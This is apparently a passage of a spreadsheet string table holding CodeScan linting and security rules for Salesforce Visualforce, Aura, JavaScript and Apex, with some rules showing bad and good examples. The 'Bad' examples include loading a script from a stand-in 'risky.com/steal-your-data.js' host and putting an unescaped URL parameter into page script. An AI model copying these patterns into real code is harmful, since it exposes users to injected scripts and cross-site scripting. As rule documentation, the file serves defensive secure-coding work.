  <si>
    <t>vf:OldPageApiVersion</t>
  </si>
  <si>
    <t>API Version is Too Old</t>
  </si>
  <si>
    <t>This rule identifies classes which are using older versions of the API. Change the API Version of this class.\n  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n&lt;?xml version="1.0" encoding="UTF-8"?&gt;\n&lt;ApexClass xmlns="http://soap.sforce.com/2006/04/metadata"&gt;\n    &lt;apiVersion&gt;19.0&lt;/apiVersion&gt;\n    &lt;status&gt;Active&lt;/status&gt;\n&lt;/ApexClass&gt;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LightningAvoidUsingSession</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for the Session Object</t>
  </si>
  <si>
    <t>Lightning Experience does not have access to the API session token. Visualforce pages used within Lightning Experience, however, still have API access to the session ID.\nTest Visualforce pages that access the session ID within Lightning Experience.\n\nSee &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n\n{! $Api.Session_ID } or {! GETSESSIONID() }\n\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LightningEnhancedListCheck</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for apex:enhancedList</t>
  </si>
  <si>
    <t>This rule looks for apex:enhancedList usage which may no longer work in lightning.\napex:enhancedList isn't supported in Lightning Experience.\nWe recommend avoiding &lt;apex:enhancedList&gt; in Lightning Experience.\n\nSee &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n\n&lt;apex:page&gt;\n	&lt;apex:enhancedList&gt;&lt;/apex:enhancedList&gt; //Bad: not recommended.\n&lt;/apex:page&gt;\n\n\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:PasswordAutocompleteCheck</t>
  </si>
  <si>
    <t>"autocomplete" Should Be Set to "off" on Input Elements of Type "password"</t>
  </si>
  <si>
    <t>&lt;p&gt;\nMost browsers automatically fill the content of input elements of type 'password' when this password has already been provided in the past.\n&lt;/p&gt;\n\n&lt;p&gt;\nImagine that user B takes control of a machine belonging to a user A.\nAccessing a secured web site as user A is trivial for user B if form input elements are automatically filled in by the browser on the site's login page.\n&lt;/p&gt;\n\n\n  \n\n\n&lt;pre&gt;\n&lt;input type="password" /&gt;		//Bad: not recommended.\n&lt;/pre&gt;\n\n\n&lt;pre&gt;\n&lt;input type="password" autocomplete="off" /&gt; 		//Good: autocomplete set to off is preferred.\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:exception</t>
  </si>
  <si>
    <t>vf:AvoidApexInScript</t>
  </si>
  <si>
    <t>Avoid Apex Tags Within Script</t>
  </si>
  <si>
    <t>Avoid using &lt;apex:*&gt; tags within &lt;script&gt; tags. &lt;apex:&gt; tags should be avoided for the following reasons:&lt;br/&gt;\n&lt;ul&gt;\n	&lt;li&gt;The code is harder to read&lt;/li&gt;\n	&lt;li&gt;CodeScan's javascript linter cannot parse the code properly&lt;/li&gt; \n	&lt;li&gt;&lt;apex:output&gt; cannot be controlled for security&lt;/li&gt;\n&lt;/ul&gt;  \n   &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n&lt;apex:page&gt;\n  &lt;script&gt;\n    &lt;apex:repeat value="{! apexArray }" var="entry"&gt;      //Bad: Apex tag is used within Script to iterate through array.\n      document.write('{! JSENCODE(entry) }');\n    &lt;/apex:repeat&gt;\n  &lt;/script&gt;\n\n  &lt;script&gt;\n   var apexArray = JSON.parse('{! JSENCODE(apexArray) }');\n   if(Array.isArray(apexArray)) apexArray.forEach(function(entry){ document.write(entry) });  //Good: Iteration is provided without using Apex tags.\n  &lt;/script&gt;\n&lt;/apex:page&gt;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidExternalResources</t>
  </si>
  <si>
    <t>External Script and Style Resources Should Be Avoided</t>
  </si>
  <si>
    <t>Including content from untrusted sources can lead to various security issues including include injection of malware,\n		information exposure by granting excessive privileges or permissions to the untrusted functionality, DOM-based XSS vulnerabilities, stealing user's cookies, or open redirect to malware.&lt;BR/&gt;\n		&lt;BR/&gt;\n		All script and style resources must be loaded via static resources.&lt;BR/&gt;\n		Do not load these resources via script tags or links. &lt;BR/&gt;\n\n&lt;h2&gt;See&lt;/h2&gt;		\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/829"&gt;MITRE, CWE-829&lt;/a&gt; - Inclusion of Functionality from Untrusted Control Sphere &lt;/li&gt;\n  &lt;li&gt; OWASP Top 10 2017 Category A1 - Injection &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat2"&gt;SANS Top 25&lt;/a&gt; - Risky Resource Management &lt;/li&gt;\n&lt;/ul&gt;\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n	\n&lt;aura:component&gt;\n\n  &lt;ltng:require \n    styles="https://blah.com/css"    //Bad: This is not recommended.\n    scripts="{!$Resource.example_js}"  //Good: Uses a static resource.\n    afterScriptsLoaded="{!c.scriptsLoaded}" /&gt;\n    \n&lt;/aura:component&gt;\n\n&lt;apex:page&gt;\n\n  &lt;apex:includeScript value="http://risky.com/steal-your-data.js"/&gt; //Bad: This is not recommended.\n  &lt;apex:stylesheet value="http://good.good.styles.com/css" /&gt;  //Bad: This is not recommended.\n\n  &lt;apex:includeScript value="{!$Resource.example_js}"/&gt;    //Good: Uses a static resource.\n  &lt;apex:stylesheet value="{!$Resource.customCSS}" /&gt;      //Good: Uses a static resource.\n  \n&lt;/apex:page&gt;\n\n\n\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:NoOnClickJavascript</t>
  </si>
  <si>
    <t>Remove OnClick Javascript</t>
  </si>
  <si>
    <t>Javascript in "onclick", "onmouseover" and similar actions within components is ignored.  These should be used to invoke actions from the controller instead.\n    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n	\n\n&lt;aura:component&gt;\n\n  &lt;input type="button" value="Flawed HTML Button" onclick="alert('bad')"/&gt;  //Bad: This will not work.\n\n  &lt;lightning:button label="Framework Button" onclick="{!c.handleClick}"/&gt;    //Good: This uses the controller action handleClick.\n\n&lt;/aura:component&gt;\n\n\n\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:RequireConfirmationToken</t>
  </si>
  <si>
    <t>Require CSRF Protection On GET Requests</t>
  </si>
  <si>
    <t>Require CSRF protection on GET requests must be enabled from the Visual Force Page settings.&lt;br/&gt;\n&lt;br/&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/352.html"&gt;MITRE, CWE-352&lt;/a&gt; - Cross-Site Request Forgery (CSRF) &lt;/li&gt;\n  &lt;li&gt; OWASP Top 10 2017 Category A6 - Security Misconfiguration &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29"&gt;OWASP: Cross-Site Request Forgery&lt;/a&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat1"&gt;SANS Top 25&lt;/a&gt; - Insecure Interaction Between Components &lt;/li&gt;\n  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_PROTECTION_DISABLED"&gt;SPRING_CSRF_PROTECTION_DISABLED&lt;/a&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://trailhead.salesforce.com/en/content/learn/modules/secdev_application_logic_vulnerabilities/secdev_app_logic_csrf"&gt;Salesforce Trailhead: Prevent Cross-Site Request Forgery (CSRF)&lt;/a&gt; &lt;/li&gt;\n&lt;/ul&gt;\n  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;//This setting must be enabled while creating a Visualforce page in Setup. &lt;/pre&gt;</t>
  </si>
  <si>
    <t>Makes sure that all values obtained from URL parameters are properly escaped / sanitized to avoid XSS attacks.&lt;br/&gt;\nInput can be sanitized JSENCODE().&lt;br/&gt;\n&lt;br/&gt;\nUsing unescaped parameters can be a security risk. \n\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_scontrols.htm"&gt;Unescaped Output and Formulas in Visualforce Pages&lt;/a&gt;&lt;/li&gt;\n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&lt;/li&gt;\n&lt;/ul&gt;\n\n\n      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n\n&lt;script&gt;\n	var value = {!$CurrentPage.parameters.username}'; //Bad: not recommended.\n	var value = {!JSONENCODE($CurrentPage.parameters.username)}'; //Good: this is preferred.\n&lt;/script&gt;\n\n    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>CodeScan JAVASCRIPT RULES</t>
  </si>
  <si>
    <t>cs-js:no-global-assign</t>
  </si>
  <si>
    <t>JavaScript</t>
  </si>
  <si>
    <t>cs-js:handle-callback-err</t>
  </si>
  <si>
    <t>cs-js:no-throw-literal</t>
  </si>
  <si>
    <t>cs-js:dot-notation</t>
  </si>
  <si>
    <t>cs-js:no-obj-calls</t>
  </si>
  <si>
    <t>cs-js:no-new</t>
  </si>
  <si>
    <t>cs-js:no-constant-condition</t>
  </si>
  <si>
    <t>cs-js:no-extend-native</t>
  </si>
  <si>
    <t>cs-js:no-proto</t>
  </si>
  <si>
    <t>cs-js:no-else-return</t>
  </si>
  <si>
    <t>cs-js:no-label-var</t>
  </si>
  <si>
    <t>cs-js:no-empty-character-class</t>
  </si>
  <si>
    <t>cs-js:no-iterator</t>
  </si>
  <si>
    <t>cs-js:no-eq-null</t>
  </si>
  <si>
    <t>cs-js:valid-typeof</t>
  </si>
  <si>
    <t>cs-js:no-extra-boolean-cast</t>
  </si>
  <si>
    <t>cs-js:no-catch-shadow</t>
  </si>
  <si>
    <t>cs-js:unknown</t>
  </si>
  <si>
    <t>cs-js:secure-window</t>
  </si>
  <si>
    <t>cs-js:no-invalid-regexp</t>
  </si>
  <si>
    <t>cs-js:no-shadow-restricted-names</t>
  </si>
  <si>
    <t>cs-js:eqeqeq</t>
  </si>
  <si>
    <t>cs-js:no-undef</t>
  </si>
  <si>
    <t>cs-js:no-control-regex</t>
  </si>
  <si>
    <t>cs-js:no-ex-assign</t>
  </si>
  <si>
    <t>cs-js:no-script-url</t>
  </si>
  <si>
    <t>cs-js:no-sparse-arrays</t>
  </si>
  <si>
    <t>cs-js:no-extra-bind</t>
  </si>
  <si>
    <t>cs-js:no-octal-escape</t>
  </si>
  <si>
    <t>cs-js:aura-api</t>
  </si>
  <si>
    <t>cs-js:new-parens</t>
  </si>
  <si>
    <t>cs-js:no-underscore-dangle</t>
  </si>
  <si>
    <t>cs-js:no-irregular-whitespace</t>
  </si>
  <si>
    <t>cs-js:no-new-object</t>
  </si>
  <si>
    <t>cs-js:no-div-regex</t>
  </si>
  <si>
    <t>cs-js:no-floating-decimal</t>
  </si>
  <si>
    <t>cs-js:ecma-intrinsics</t>
  </si>
  <si>
    <t>cs-js:wrap-iife</t>
  </si>
  <si>
    <t>cs-js:no-implied-eval</t>
  </si>
  <si>
    <t>cs-js:no-param-reassign</t>
  </si>
  <si>
    <t>cs-js:secure-document</t>
  </si>
  <si>
    <t>cs-js:no-new-wrappers</t>
  </si>
  <si>
    <t>cs-js:no-return-assign</t>
  </si>
  <si>
    <t>cs-js:no-self-compare</t>
  </si>
  <si>
    <t>cs-js:no-regex-spaces</t>
  </si>
  <si>
    <t>cs-js:no-func-assign</t>
  </si>
  <si>
    <t>cs-js:no-unreachable</t>
  </si>
  <si>
    <t>cs-js:exception</t>
  </si>
  <si>
    <t>key</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>mdDesc</t>
  </si>
  <si>
    <t>severity</t>
  </si>
  <si>
    <t>langName</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>Files should contain an empty newline at the end</t>
  </si>
  <si>
    <t>javascript:S2589</t>
  </si>
  <si>
    <t>Boolean expressions should not be gratuitous</t>
  </si>
  <si>
    <t>javascript:S3799</t>
  </si>
  <si>
    <t>Destructuring patterns should not be empty</t>
  </si>
  <si>
    <t>javascript:S1135</t>
  </si>
  <si>
    <t>Track uses of "TODO" tags</t>
  </si>
  <si>
    <t>javascript:S3796</t>
  </si>
  <si>
    <t>Callbacks of array methods should have return statements</t>
  </si>
  <si>
    <t>javascript:S1134</t>
  </si>
  <si>
    <t>Track uses of "FIXME" tags</t>
  </si>
  <si>
    <t>javascript:S2583</t>
  </si>
  <si>
    <t>Conditionally executed blocks should be reachable</t>
  </si>
  <si>
    <t>javascript:S3317</t>
  </si>
  <si>
    <t>Default export names and file names should match</t>
  </si>
  <si>
    <t>Redundant pairs of parentheses should be removed</t>
  </si>
  <si>
    <t>javascript:S2234</t>
  </si>
  <si>
    <t>Parameters should be passed in the correct order</t>
  </si>
  <si>
    <t>javascript:S3686</t>
  </si>
  <si>
    <t>Functions should not be called both with and without "new"</t>
  </si>
  <si>
    <t>javascript:S1143</t>
  </si>
  <si>
    <t>Jump statements should not occur in "finally" blocks</t>
  </si>
  <si>
    <t>javascript:S1264</t>
  </si>
  <si>
    <t>A "while" loop should be used instead of a "for" loop</t>
  </si>
  <si>
    <t>javascript:S881</t>
  </si>
  <si>
    <t>Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression</t>
  </si>
  <si>
    <t>Property names should not be duplicated within a class or object literal</t>
  </si>
  <si>
    <t>javascript:S878</t>
  </si>
  <si>
    <t>Comma operator should not be used</t>
  </si>
  <si>
    <t>javascript:S3776</t>
  </si>
  <si>
    <t>Cognitive Complexity of functions should not be too high</t>
  </si>
  <si>
    <t>javascript:S2688</t>
  </si>
  <si>
    <t>"NaN" should not be used in comparisons</t>
  </si>
  <si>
    <t>javascript:S2201</t>
  </si>
  <si>
    <t>Return values from functions without side effects should not be ignored</t>
  </si>
  <si>
    <t>javascript:S2685</t>
  </si>
  <si>
    <t>"arguments.caller" and "arguments.callee" should not be used</t>
  </si>
  <si>
    <t>javascript:S3531</t>
  </si>
  <si>
    <t>Generators should "yield" something</t>
  </si>
  <si>
    <t>javascript:S2681</t>
  </si>
  <si>
    <t>Multiline blocks should be enclosed in curly braces</t>
  </si>
  <si>
    <t>javascript:S1472</t>
  </si>
  <si>
    <t>Function call arguments should not start on new lines</t>
  </si>
  <si>
    <t>Function argument names should be unique</t>
  </si>
  <si>
    <t>javascript:S1116</t>
  </si>
  <si>
    <t>Extra semicolons should be removed</t>
  </si>
  <si>
    <t>Assignments should not be made from within sub-expressions</t>
  </si>
  <si>
    <t>"for...in" loops should filter properties before acting on them</t>
  </si>
  <si>
    <t>javascript:S1126</t>
  </si>
  <si>
    <t>Return of boolean expressions should not be wrapped into an "if-then-else" statement</t>
  </si>
  <si>
    <t>javascript:S1488</t>
  </si>
  <si>
    <t>Local variables should not be declared and then immediately returned or thrown</t>
  </si>
  <si>
    <t>javascript:S1125</t>
  </si>
  <si>
    <t>Boolean literals should not be used in comparisons</t>
  </si>
  <si>
    <t>javascript:S3785</t>
  </si>
  <si>
    <t>"in" should not be used with primitive types</t>
  </si>
  <si>
    <t>javascript:S3786</t>
  </si>
  <si>
    <t>Template literal placeholder syntax should not be used in regular strings</t>
  </si>
  <si>
    <t>javascript:S2692</t>
  </si>
  <si>
    <t>"indexOf" checks should not be for positive numbers</t>
  </si>
  <si>
    <t>javascript:S3782</t>
  </si>
  <si>
    <t>Arguments to built-in functions should match documented types</t>
  </si>
  <si>
    <t>javascript:S1128</t>
  </si>
  <si>
    <t>Unnecessary imports should be removed</t>
  </si>
  <si>
    <t>javascript:S3358</t>
  </si>
  <si>
    <t>Ternary operators should not be nested</t>
  </si>
  <si>
    <t>Debugger statements should not be used</t>
  </si>
  <si>
    <t>Function declarations should not be made within blocks</t>
  </si>
  <si>
    <t>Octal values should not be used</t>
  </si>
  <si>
    <t>Nested blocks of code should not be left empty</t>
  </si>
  <si>
    <t>javascript:S2703</t>
  </si>
  <si>
    <t>Variables should be declared explicitly</t>
  </si>
  <si>
    <t>javascript:S1854</t>
  </si>
  <si>
    <t>Wrapper objects should not be used for primitive types</t>
  </si>
  <si>
    <t>javascript:S2819</t>
  </si>
  <si>
    <t>Cross-document messaging domains should be carefully restricted</t>
  </si>
  <si>
    <t>javascript:S1862</t>
  </si>
  <si>
    <t>Functions should not have too many parameters</t>
  </si>
  <si>
    <t>javascript:S3002</t>
  </si>
  <si>
    <t>Unary operators "+" and "-" should not be used with objects</t>
  </si>
  <si>
    <t>javascript:S3003</t>
  </si>
  <si>
    <t>Comparison operators should not be used with strings</t>
  </si>
  <si>
    <t>javascript:S3001</t>
  </si>
  <si>
    <t>"delete" should be used only with object properties</t>
  </si>
  <si>
    <t>javascript:S3923</t>
  </si>
  <si>
    <t>All branches in a conditional structure should not have exactly the same implementation</t>
  </si>
  <si>
    <t>javascript:S3800</t>
  </si>
  <si>
    <t>Functions should always return the same type</t>
  </si>
  <si>
    <t>javascript:S3801</t>
  </si>
  <si>
    <t>Functions should use "return" consistently</t>
  </si>
  <si>
    <t>Multiline string literals should not be used</t>
  </si>
  <si>
    <t>javascript:S3699</t>
  </si>
  <si>
    <t>The output of functions that don't return anything should not be used</t>
  </si>
  <si>
    <t>javascript:S3579</t>
  </si>
  <si>
    <t>Array indexes should be numeric</t>
  </si>
  <si>
    <t>javascript:S2123</t>
  </si>
  <si>
    <t>Values should not be uselessly incremented</t>
  </si>
  <si>
    <t>Sections of code should not be commented out</t>
  </si>
  <si>
    <t>javascript:S2138</t>
  </si>
  <si>
    <t>"undefined" should not be assigned</t>
  </si>
  <si>
    <t>javascript:S2259</t>
  </si>
  <si>
    <t>Properties of variables with "null" or "undefined" values should not be accessed</t>
  </si>
  <si>
    <t>javascript:S2814</t>
  </si>
  <si>
    <t>Variables and functions should not be redeclared</t>
  </si>
  <si>
    <t>javascript:S2251</t>
  </si>
  <si>
    <t>A "for" loop update clause should move the counter in the right direction</t>
  </si>
  <si>
    <t>javascript:S138</t>
  </si>
  <si>
    <t>javascript:S930</t>
  </si>
  <si>
    <t>Function calls should not pass extra arguments</t>
  </si>
  <si>
    <t>Lines should not be too long</t>
  </si>
  <si>
    <t>&lt;p&gt;Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1656</t>
  </si>
  <si>
    <t>Variables should not be self-assigned</t>
  </si>
  <si>
    <t>javascript:S3834</t>
  </si>
  <si>
    <t>"Symbol" should not be used as a constructor</t>
  </si>
  <si>
    <t>javascript:S104</t>
  </si>
  <si>
    <t>javascript:S1301</t>
  </si>
  <si>
    <t>"switch" statements should have at least 3 "case" clauses</t>
  </si>
  <si>
    <t>javascript:S2873</t>
  </si>
  <si>
    <t>Calls should not be made to non-callable values</t>
  </si>
  <si>
    <t>javascript:S2870</t>
  </si>
  <si>
    <t>"delete" should not be used on arrays</t>
  </si>
  <si>
    <t>javascript:S2990</t>
  </si>
  <si>
    <t>The global "this" object should not be used</t>
  </si>
  <si>
    <t>javascript:S2757</t>
  </si>
  <si>
    <t>Non-existent operators '=+', '=-' and '=!' should not be used</t>
  </si>
  <si>
    <t>javascript:S2999</t>
  </si>
  <si>
    <t>"new" operators should be used with functions</t>
  </si>
  <si>
    <t>"strict" mode should be used with caution</t>
  </si>
  <si>
    <t>javascript:S1788</t>
  </si>
  <si>
    <t>Function parameters with default values should be last</t>
  </si>
  <si>
    <t>javascript:S1994</t>
  </si>
  <si>
    <t>"for" loop increment clauses should modify the loops' counters</t>
  </si>
  <si>
    <t>javascript:S1751</t>
  </si>
  <si>
    <t>javascript:S1871</t>
  </si>
  <si>
    <t>Two branches in a conditional structure should not have exactly the same implementation</t>
  </si>
  <si>
    <t>javascript:S3812</t>
  </si>
  <si>
    <t>Results of "in" and "instanceof" should be negated rather than operands</t>
  </si>
  <si>
    <t>"future reserved words" should not be used as identifiers</t>
  </si>
  <si>
    <t>javascript:S1764</t>
  </si>
  <si>
    <t>Identical expressions should not be used on both sides of a binary operator</t>
  </si>
  <si>
    <t>javascript:S101</t>
  </si>
  <si>
    <t>Class names should comply with a naming convention</t>
  </si>
  <si>
    <t>javascript:S3828</t>
  </si>
  <si>
    <t>"yield" expressions should not be used outside generators</t>
  </si>
  <si>
    <t>javascript:S2424</t>
  </si>
  <si>
    <t>Built-in objects should not be overridden</t>
  </si>
  <si>
    <t>javascript:S1219</t>
  </si>
  <si>
    <t>"switch" statements should not contain non-case labels</t>
  </si>
  <si>
    <t>javascript:S2427</t>
  </si>
  <si>
    <t>The base should be provided to "parseInt"</t>
  </si>
  <si>
    <t>javascript:S3516</t>
  </si>
  <si>
    <t>Function returns should not be invariant</t>
  </si>
  <si>
    <t>javascript:S3758</t>
  </si>
  <si>
    <t>Values not convertible to numbers should not be used in numeric comparisons</t>
  </si>
  <si>
    <t>javascript:S3757</t>
  </si>
  <si>
    <t>Arithmetic operations should not result in "NaN"</t>
  </si>
  <si>
    <t>javascript:S4043</t>
  </si>
  <si>
    <t>Array-mutating methods should not be used misleadingly</t>
  </si>
  <si>
    <t>javascript:S4165</t>
  </si>
  <si>
    <t>Assignments should not be redundant</t>
  </si>
  <si>
    <t>Unused local variables and functions should be removed</t>
  </si>
  <si>
    <t>javascript:S3403</t>
  </si>
  <si>
    <t>Strict equality operators should not be used with dissimilar types</t>
  </si>
  <si>
    <t>javascript:S2432</t>
  </si>
  <si>
    <t>Setters should not return values</t>
  </si>
  <si>
    <t>Array constructors should not be used</t>
  </si>
  <si>
    <t>javascript:S2310</t>
  </si>
  <si>
    <t>Loop counters should not be assigned to from within the loop body</t>
  </si>
  <si>
    <t>Statements should be on separate lines</t>
  </si>
  <si>
    <t>javascript:S3854</t>
  </si>
  <si>
    <t>"super()" should be invoked appropriately</t>
  </si>
  <si>
    <t>javascript:S3972</t>
  </si>
  <si>
    <t>Conditionals should start on new lines</t>
  </si>
  <si>
    <t>javascript:S3973</t>
  </si>
  <si>
    <t>A conditionally executed single line should be denoted by indentation</t>
  </si>
  <si>
    <t>javascript:S4144</t>
  </si>
  <si>
    <t>Functions should not have identical implementations</t>
  </si>
  <si>
    <t>javascript:S2769</t>
  </si>
  <si>
    <t>Selection results should be tested with "length"</t>
  </si>
  <si>
    <t>javascript:S3616</t>
  </si>
  <si>
    <t>Comma and logical OR operators should not be used in switch cases</t>
  </si>
  <si>
    <t>javascript:S3735</t>
  </si>
  <si>
    <t>"void" should not be used</t>
  </si>
  <si>
    <t>"with" statements should not be used</t>
  </si>
  <si>
    <t>Switch cases should end with an unconditional "break" statement</t>
  </si>
  <si>
    <t>javascript:S4143</t>
  </si>
  <si>
    <t>Collection elements should not be replaced unconditionally</t>
  </si>
  <si>
    <t>javascript:S888</t>
  </si>
  <si>
    <t>Equality operators should not be used in "for" loop termination conditions</t>
  </si>
  <si>
    <t>Bitwise operators should not be used in boolean contexts</t>
  </si>
  <si>
    <t>javascript:S3500</t>
  </si>
  <si>
    <t>Attempts should not be made to update "const" variables</t>
  </si>
  <si>
    <t>javascript:S3863</t>
  </si>
  <si>
    <t>Imports from the same modules should be merged</t>
  </si>
  <si>
    <t>javascript:S3984</t>
  </si>
  <si>
    <t>Errors should not be created without being thrown</t>
  </si>
  <si>
    <t>javascript:S1442</t>
  </si>
  <si>
    <t>"alert(...)" should not be used</t>
  </si>
  <si>
    <t>javascript:S3981</t>
  </si>
  <si>
    <t>Collection sizes and array length comparisons should make sense</t>
  </si>
  <si>
    <t>Lines should not end with trailing whitespaces</t>
  </si>
  <si>
    <t>javascript:S3509</t>
  </si>
  <si>
    <t>Default parameters should not cause side effects</t>
  </si>
  <si>
    <t>javascript:S3504</t>
  </si>
  <si>
    <t>Variables should be declared with "let" or "const"</t>
  </si>
  <si>
    <t>Functions should not be defined inside loops</t>
  </si>
  <si>
    <t>javascript:S4030</t>
  </si>
  <si>
    <t>Collection and array contents should be used</t>
  </si>
  <si>
    <t>APEX SECURITY HOTSPOTS</t>
  </si>
  <si>
    <t>sf:HotspotTypeReflection</t>
  </si>
  <si>
    <t>Type Reflection Is Security Sensitive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</si>
  <si>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</si>
  <si>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SECURITY_HOTSPOT</t>
  </si>
  <si>
    <t>sf:HotspotEncrypt</t>
  </si>
  <si>
    <t>Encrypting Data Is Security-Sensitive</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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sf:HotspotUserInfoGetSessionIdUsage</t>
  </si>
  <si>
    <t>Using UserInfo.GetSessionId() Is Security-Sensitive</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</si>
  <si>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</si>
  <si>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sf:HotspotDeserializeJson</t>
  </si>
  <si>
    <t>Deserializing JSON Is Security-Sensitive</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</si>
  <si>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</si>
  <si>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</si>
  <si>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vf:HotspotGetSessionIdUsage</t>
  </si>
  <si>
    <t>Using GETSESSIONID() and $API.Session_Id is security-sensitive</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</si>
  <si>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</si>
  <si>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</si>
  <si>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sfmeta:SecuritySettings</t>
  </si>
  <si>
    <t>Enforce Org Security Settings</t>
  </si>
  <si>
    <t>Enforce various org security settings. Default settings can be modified and any password policy or session setting configured.\n\nThis rule requires .settings file using\n&amp;lt;types&amp;gt;\n	&amp;lt;members&amp;gt;Security&amp;lt;/members&amp;gt;\n    &amp;lt;name&amp;gt;Settings&amp;lt;/name&amp;gt;\n&amp;lt;/types&amp;gt;</t>
  </si>
  <si>
    <t>Salesforce Metadata (BETA)</t>
  </si>
  <si>
    <t>sfmeta:AvoidAllRecordPermissions</t>
  </si>
  <si>
    <t>Object Permissions should not be permissive</t>
  </si>
  <si>
    <t>sfmeta:SharingRecordTypeId</t>
  </si>
  <si>
    <t>Record Type ID is Missing</t>
  </si>
  <si>
    <t>sfmeta:RequireDescriptionField</t>
  </si>
  <si>
    <t>Custom fields must have a description field</t>
  </si>
  <si>
    <t>VISUALFORCE and AURA LIGHTNING RULES</t>
  </si>
  <si>
    <t>sfmeta:CustomFieldSecurityInStandardObject</t>
  </si>
  <si>
    <t>Use Page Layout or FLS to mark CustomField as required</t>
  </si>
  <si>
    <t>The custom fields should be marked as required on standard/shared objects through page layout or field level security rather than at system level.</t>
  </si>
  <si>
    <t>sfmeta:RequireDescriptionComponent</t>
  </si>
  <si>
    <t>Custom Metadata components must have a description field</t>
  </si>
  <si>
    <t>Custom Metadata components should have a description of their functionality making it easy\nfor others to understand the purpose and functionality of the component as it may not always\nbe understandable from the name.\n\nIf you have a project namespace, then it's recommended to include this namespace into\nthe description of your shared components. You can configure this rule to verify this by setting\nadditional property 'requireProjectNamespace' of this rule to true value.\n\nNote, checking projects namespace inside component description will work only with Salesforce\nintegration type in CodeScan Cloud because it requires to execute extra Metadata APIs to retrieve\nproperties of Metadata components in your project.\n\nAlternatively you may manually create the required 'component-properties.json' file which includes results\nof executing 'sfdx force:mdapi:listmetadata' properties and put it inside root of your project. In this case\nthe rule will also be able to verify project namespace in the shared components of your project.\n     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;\n \n&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;\n&amp;lt;CustomObject xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;\n	........\n    &amp;lt;fields&amp;gt;\n        &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;       //Bad: This custom field does not have a description.\n        &amp;lt;externalId&gt;false&amp;lt;/externalId&amp;gt;\n        &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;\n        &amp;lt;type&gt;Currency&amp;lt;/type&amp;gt;\n    &amp;lt;/fields&amp;gt;\n  ..........\n&amp;lt;/CustomObject&amp;gt;\n\n&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;\n&amp;lt;CustomObject xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;\n	........\n    &amp;lt;fields&gt;\n        &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;\n        &amp;lt;description&amp;gt;This is a description of price&amp;lt;/description&amp;gt;   //Good: A description is recommended.\n        &amp;lt;externalId&amp;gt;false&amp;lt;/externalId&amp;gt;\n        &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;\n        &amp;lt;type&amp;gt;Currency&amp;lt;/type&amp;gt;\n    &amp;lt;/fields&amp;gt;\n  ..........\n&amp;lt;/CustomObject&amp;gt;\n\n&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;\n&amp;lt;CustomField xmlns="http://soap.sforce.com/2006/04/metadata"&amp;gt;\n	........\n      &amp;lt;fullName&gt;Price__c&amp;lt;/fullName&amp;gt;       //Bad: This custom field does not have a description.\n      &amp;lt;externalId&gt;false&amp;lt;/externalId&amp;gt;\n      &amp;lt;label&amp;gt;Price&amp;lt;/label&amp;gt;\n      &amp;lt;type&gt;Currency&amp;lt;/type&amp;gt;\n  ..........\n&amp;lt;/CustomField&amp;gt;\n\n&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;\n&amp;lt;CustomField 